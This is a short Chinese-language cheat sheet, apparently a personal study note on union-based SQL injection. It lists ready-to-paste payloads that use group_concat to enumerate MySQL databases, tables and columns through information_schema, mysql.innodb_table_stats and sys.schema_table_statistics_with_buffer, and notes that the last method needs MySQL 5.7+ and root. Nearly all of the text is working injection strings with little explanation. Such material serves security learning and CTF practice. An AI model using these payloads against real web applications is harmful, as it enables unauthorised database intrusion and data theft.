爆库、爆表、爆字段.md

基本原理都是利用group_concat以及mysql的元数据库或元表格

下面假设查询结果为三个字段，且注入点为2

---

使用imformation_schema数据库

爆库

获取当前数据库

1' union select 1,database(),3;#

爆出所有数据库

1' union select 1,group_concat(schema_name),3 from information_schema.schemata;#

爆表

1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='<database_name>';#

爆字段

1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='<table_name>';#

---

使用mysql.innodb_table_stats表

爆库

1' union select 1,group_concat(database_name),3 from mysql.innodb_table_stats#

爆表

1' union select 1,group_concat(table_name),3 from mysql.innodb_table_stats#

---

使用sys.schema_table_statistics_with_buffer表

前提条件

• mysql > 5.7
• root用户

爆表

1' union select 1,group_concat(table_name),3 from sys.schema_table_statistics_with_buffer where table_schema=<database_name>#

#Web #SQL注入 #联合注入